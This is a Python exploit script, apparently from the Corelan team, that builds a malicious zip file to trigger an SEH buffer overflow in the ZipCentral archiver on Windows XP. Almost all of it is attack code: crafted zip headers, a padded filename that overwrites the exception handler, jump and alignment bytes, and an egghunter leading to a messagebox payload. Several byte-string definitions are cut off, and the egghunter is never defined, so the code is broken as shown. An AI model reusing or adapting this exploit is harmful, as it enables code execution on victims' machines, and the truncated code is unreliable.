# Title:ZipCentral (.zip) SEH exploit
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Download: http://downloads.pcworld.com/pub/new/utilities/compression/zcsetup.exe
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to:Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly i have created my own
# Mangled Chart: http://tecninja.net/blog/?p=35
# Discription of exploit: http://tecninja.net/blog/?p=73
# You can notice i have used this technique for my PPR and JMPs
print "|------------------------------------------------------------------|"
print "| __ __|"
print "| _________________/ /___ _____ / /________ _____ ___|"
print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|"
print "||"
print "| http://www.corelan.be:8800 |"
print "|security@corelan.be |"
print "||"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
#Limit of 50 bytes for the filename
#filename = ("\x50\x41\x53"
filename = (
# ESI - Im going to enjoy watching you die Mr Anderson
# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98")
# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"
buff = filename
buff += "\x20" * (50-len(buff))
buff += "\x57\x30\x30\x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "\x57\x30\x30\x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "\x41" * (653-len(buff))
buff += "\x89\x06\x42\x42"
buff += "\x56\x29\xa5\x72" # Welcome to the desert of the real
buff += "\x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "\x42" * (4064-len(buff))
buff += ".txt"
mefile = open('pill.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);